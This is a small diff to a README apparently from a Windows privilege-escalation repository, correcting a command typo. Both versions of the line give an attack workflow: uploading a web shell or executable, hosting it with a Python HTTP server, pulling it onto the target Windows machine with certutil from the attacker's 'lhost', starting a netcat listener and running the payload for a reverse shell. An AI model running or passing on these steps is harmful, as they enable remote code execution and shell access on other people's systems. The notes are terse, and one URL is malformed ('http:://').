Lalitkumar21/winescalation/README.md

 now upload robensive.aspx or test.exe ,
-For uploading (for 2nd method), python3 -m http-server 8000(for running a server from the linux terminal), certutil -urlcache -f -split http:://lhost:8000/test.exe test.exe(On target windows command prompt), nc -lnvp 8989 (on termainal), test.exe
+For uploading (for 2nd method), python3 -m http.server 8000(for running a server from the linux terminal), certutil -urlcache -f -split http:://lhost:8000/test.exe test.exe(On target windows command prompt), nc -lnvp 8989 (on termainal), test.exe